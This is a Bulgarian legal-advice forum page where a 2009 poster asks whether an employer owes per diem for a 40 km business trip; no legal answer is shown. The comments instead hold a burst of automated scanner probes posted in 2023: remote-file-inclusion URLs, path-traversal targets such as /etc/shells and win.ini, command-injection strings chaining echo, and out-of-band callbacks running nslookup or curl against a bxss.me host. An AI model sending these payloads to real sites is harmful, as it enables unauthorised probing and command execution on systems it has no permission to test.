Командировка

22.02.2009г. 09:07:16
Поради възникнала целесъобразност от предприятието в което работя ме командироваха на 40 км в друг град от същата област,като ми заплащат само пътните ,но отказват да ми заплатят дневни.Имам ли право на дневни?

Правни мнения, съвети и коментари

lxbfYeaa
05.10.2023г. 07:24
Http://bxss.me/t/fit.txt
lxbfYeaa
05.10.2023г. 07:24
http://bxss.me/t/fit.txt?.jpg
lxbfYeaa
05.10.2023г. 07:24
/etc/shells
lxbfYeaa
05.10.2023г. 07:24
echo eeqyxf$()\ yzrbpn\nz^xyu||a #' &echo eeqyxf$()\ yzrbpn\nz^xyu||a #|" &echo eeqyxf$()\ yzrbpn\nz^xyu||a #
lxbfYeaa
05.10.2023г. 07:24
c:/windows/win.ini
lxbfYeaa
05.10.2023г. 07:24
&echo pnsigh$()\ kylhdg\nz^xyu||a #' &echo pnsigh$()\ kylhdg\nz^xyu||a #|" &echo pnsigh$()\ kylhdg\nz^xyu||a #
lxbfYeaa
05.10.2023г. 07:24
bxss.me
lxbfYeaa
05.10.2023г. 07:24
|echo rywyri$()\ qqjzhz\nz^xyu||a #' |echo rywyri$()\ qqjzhz\nz^xyu||a #|" |echo rywyri$()\ qqjzhz\nz^xyu||a #
lxbfYeaa
05.10.2023г. 07:24
(nslookup -q=cname hitfjcigkissc54053.bxss.me||curl hitfjcigkissc54053.bxss.me))
lxbfYeaa
05.10.2023г. 07:24
$(nslookup -q=cname hitmpzhbkdbgu1cf50.bxss.me||curl hitmpzhbkdbgu1cf50.bxss.me)

Коментар